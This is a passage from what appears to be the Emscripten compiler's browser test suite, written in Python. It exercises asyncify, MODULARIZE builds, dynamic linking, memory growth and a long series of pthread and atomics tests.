'empty_list': (['-DBAD', '-s', 'ASYNCIFY_IMPORTS=[]'],), # noqa
'em_js_bad': (['-DBAD', '-DUSE_EM_JS'],), # noqa
})
@no_fastcomp('emterpretify never worked here')
def test_async_returnvalue(self, args):
if '@' in str(args):
create_test_file('filey.txt', '["sync_tunnel"]')
self.btest('browser/async_returnvalue.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_IGNORE_INDIRECT', '--js-library', path_from_root('tests', 'browser', 'async_returnvalue.js')] + args + ['-s', 'ASSERTIONS=1'])
@no_fastcomp('wasm backend asyncify specific')
def test_async_stack_overflow(self):
self.btest('browser/async_stack_overflow.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_STACK_SIZE=4'])
@no_fastcomp('wasm backend asyncify specific')
def test_async_bad_whitelist(self):
self.btest('browser/async_bad_whitelist.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_WHITELIST=["waka"]', '--profiling'])
# Tests that when building with -s MINIMAL_RUNTIME=1, the build can use -s MODULARIZE=1 as well.
@no_wasm_backend('MINIMAL_RUNTIME not yet for wasm backend')
def test_minimal_runtime_modularize(self):
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.html', '-s', 'MODULARIZE=1', '-s', 'MINIMAL_RUNTIME=1'])
self.run_browser('test.html', None, '/report_result?0')
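# Test -s MODULARIZE=1: the generated module must not pollute the global scope
# and must be usable via Module()/EXPORT_NAME, with Module options passed in,
# and through the then() API.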
@requires_sync_compilation
def test_modularize(self):
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
for args, code in [
([], 'Module();'), # defaults
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // erroneous module capture will load this and cause a timeout
HelloWorld();
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var hello = HelloWorld({ noInitialRun: true, onRuntimeInitialized: function() {
setTimeout(function() { hello._main(); }); // must be async, because onRuntimeInitialized may be called synchronously, so |hello| is not yet set!
} });
'''),
# similar, but without a mem init file, everything is sync and simple
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
var hello = HelloWorld({ noInitialRun: true});
hello._main();
'''),
# use the then() API
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(function(hello) {
hello._main();
});
'''),
# then() API, also note the returned value
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var helloOutside = HelloWorld({ noInitialRun: true }).then(function(hello) {
setTimeout(function() {
hello._main();
if (hello !== helloOutside) throw 'helloOutside has not been set!'; // as we are async, helloOutside must have been set
});
});
'''),
]:
print('test on', opts, args, code)
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
# this test is synchronous, so avoid async startup due to wasm features
self.compile_btest(['test.c', '-s', 'MODULARIZE=1', '-s', 'WASM_ASYNC_COMPILATION=0', '-s', 'SINGLE_FILE=1'] + args + opts)
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
# test illustrating the regression on the modularize feature since commit c5af8f6
# when compiling with the --preload-file option
@no_wasm_backend('cannot customize TOTAL_MEMORY in wasm at runtime')
def test_modularize_and_preload_files(self):
# amount of memory different from the default one that will be allocated for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
# the main function simply checks that the amount of allocated heap memory is correct
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use eval here in order for the test with closure compiler enabled to succeed
var totalMemory = Module['TOTAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
REPORT_RESULT(0);
return 0;
}
''' % totalMemory
create_test_file('test.c', self.with_report_result(src))
# generate a dummy file
create_test_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
self.compile_btest(['test.c', '-s', 'WASM=0', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom TOTAL_MEMORY value
var foo = Foo({ TOTAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
run_process([PYTHON, path_from_root('tools', 'webidl_binder.py'),
path_from_root('tests', 'webidl', 'test.idl'),
'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
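# Test basic dynamic linking: a MAIN_MODULE calls into a SIDE_MODULE
# (side.wasm), run both on the main thread and proxied to a worker.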
@requires_sync_compilation
def test_dynamic_link(self):
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
REPORT_RESULT(2);
return 0;
}
''')
create_test_file('side.cpp', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
run_process([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL=1'])
print('wasm in worker (we can read binary data synchronously there)')
create_test_file('pre.js', '''
var Module = { dynamicLibraries: ['side.wasm'] };
''')
run_process([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-s', 'WASM=1', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'WASM=1', '--proxy-to-worker', '-s', 'EXPORT_ALL=1'])
print('wasm (will auto-preload since no sync binary reading)')
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
# same wasm side module works
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'WASM=1', '-s', 'EXPORT_ALL=1'])
# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
def test_dylink_dso_needed_wasm(self):
self._test_dylink_dso_needed(1, 0)
def test_dylink_dso_needed_wasm_inworker(self):
self._test_dylink_dso_needed(1, 1)
def test_dylink_dso_needed_asmjs(self):
self._test_dylink_dso_needed(0, 0)
def test_dylink_dso_needed_asmjs_inworker(self):
self._test_dylink_dso_needed(0, 1)
@no_wasm_backend('https://github.com/emscripten-core/emscripten/issues/8753')
@requires_sync_compilation
def _test_dylink_dso_needed(self, wasm, inworker):
# here we reuse runner._test_dylink_dso_needed, but the code is run via browser.
print('\n# wasm=%d inworker=%d' % (wasm, inworker))
self.set_setting('WASM', wasm)
self.emcc_args += ['-O2']
def do_run(src, expected_output):
# XXX there is no infrastructure (yet ?) to retrieve stdout from browser in tests.
# -> do the assert about expected output inside browser.
#
# we have to put the hook into post.js because in main it is too late
# (in main we won't be able to catch what static constructors inside
# linked dynlibs printed), and in pre.js it is too early (out is not yet
# setup by the shell).
create_test_file('post.js', r'''
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = "";
Module.printed += x + '\n'; // out is passed str without last \n
Module.realPrint(x);
};
''')
src += r'''
int main() {
_main();
EM_ASM({
var expected = %r;
assert(Module.printed === expected, ['stdout expected:', expected]);
});
REPORT_RESULT(0);
}
''' % (expected_output,)
# --proxy-to-worker only on main
if inworker:
self.emcc_args += ['--proxy-to-worker']
self.btest(src, '0', args=self.get_emcc_args() + ['--post-js', 'post.js'])
super(browser, self)._test_dylink_dso_needed(do_run)
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
REPORT_RESULT(1);
return 0;
}
''')
create_test_file('side.cpp', r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
run_process([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-lSDL', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE=1', '-O2', '-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL=1'])
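# Preloading ~30MB of data with only a 16MB initial heap forces memory growth
# while the runtime is still starting up.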
def test_memory_growth_during_startup(self):
create_test_file('data.dat', 'X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=16MB', '-s', 'TOTAL_STACK=16384', '--preload-file', 'data.dat'])
# pthreads tests
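# Build a shell page that hides SharedArrayBuffer/Atomics, presumably so tests
# can exercise the code paths used when threads are unavailable.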
def prep_no_SAB(self):
create_test_file('html.html', open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
# Test that the emscripten_ atomics api functions work.
@parameterized({
'normal': ([],),
'closure': (['--closure', '1'],),
})
@requires_threads
def test_pthread_atomics(self, args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '-g1'] + args)
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@requires_threads
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads + ['-std=c++11'])
@parameterized({
'join': ('join',),
'wait': ('wait',),
})
@requires_threads
def test_pthread_main_thread_blocking(self, name):
print('Test that we error if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
if name == 'join':
print('Test that by default we just warn about blocking on the main thread.')
self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(path_from_root('tests', 'pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD, and even without a pool')
self.btest(path_from_root('tests', 'pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS=1', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that everything works ok when we are on a pthread.')
self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
# We need to resort to using regexes to optimize out SharedArrayBuffer when pthreads are not supported, which is brittle!
# Therefore perform very extensive testing of different codegen modes to catch any problems.
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-O3', '-s', 'AGGRESSIVE_VARIABLE_ELIMINATION=1'], ['-Os']]:
for debug in [[], ['-g1'], ['-g2'], ['-g4']]:
for f32 in [[], ['-s', 'PRECISE_F32=1', '--separate-asm', '-s', 'WASM=0']]:
args = opt + debug + f32
print(args)
if self.is_wasm_backend() and ('--separate-asm' in args or 'AGGRESSIVE_VARIABLE_ELIMINATION=1' in args):
continue
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=args + ['-s', 'TOTAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# 64 bit version of the above test.
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Tests the rest of the remaining GCC atomics after the two above tests.
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, also_asmjs=True)
# Test that basic thread creation works.
@requires_threads
def test_pthread_create(self):
def test(args):
print(args)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + args)
test([])
test(['-O3'])
test(['-s', 'MODULARIZE_INSTANCE=1'])
# Test that preallocating worker threads works.
@requires_threads
def test_pthread_preallocates_workers(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_preallocates_workers.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=4', '-s', 'PTHREAD_POOL_DELAY_LOAD=1'])
# Test that allocating a lot of threads doesn't regress. This needs to be checked manually!
@requires_threads
def test_pthread_large_pthread_allocation(self):
self.btest(path_from_root('tests', 'pthread', 'test_large_pthread_allocation.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=128MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=50'], message='Check output from test to ensure that a regression in time it takes to allocate the threads has not occurred.')
# Tests the -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_to_pthread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'] + modularize)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that threads can rejoin the pool once detached and finished
@requires_threads
def test_std_thread_detach(self):
self.btest(path_from_root('tests', 'pthread', 'test_std_thread_detach.cpp'), expected='0', args=['-std=c++11', '-s', 'USE_PTHREADS=1'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
@no_chrome('pthread_kill hangs the Chrome renderer and keeps subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
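# Test the pthread_attr_getstack() API.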
@requires_threads
def test_pthread_attr_getstack(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_attr_getstack.cpp'), expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'TOTAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_once.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test against a certain thread exit time handling bug by spawning tons of threads.
@requires_threads
def test_pthread_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ASSERTIONS=1'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
def run(debug):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_printf.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'LIBRARY_DEBUG=%d' % debug])
run(debug=True)
run(debug=False)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that the main thread is able to use pthread_set/getspecific.
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1'], also_asmjs=True)
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args)
# Test that --separate-asm works with -s USE_PTHREADS=1.
@no_wasm_backend('asm.js')
@requires_threads
def test_pthread_separate_asm_pthreads(self):
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '--profiling'] + modularize)
# Test the operation of Module.pthreadMainPrefixURL variable
@no_wasm_backend('uses js')
@requires_threads
def test_pthread_custom_pthread_main_url(self):
ensure_dir('cdn')
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT(result);
}
'''))
# Test that it is possible to define "Module.locateFile" string to locate where worker.js will be loaded from.
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test.html'])
shutil.move('test.worker.js', os.path.join('cdn', 'test.worker.js'))
if self.is_wasm_backend():
shutil.copyfile('test.html.mem', os.path.join('cdn', 'test.html.mem'))
self.run_browser('test.html', '', '/report_result?1')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test2.html'])
try_delete('test.worker.js')
self.run_browser('test2.html', '', '/report_result?1')
# Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), we do not deadlock.
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(path_from_root('tests', 'pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'TOTAL_MEMORY=128MB'])
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts)
# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
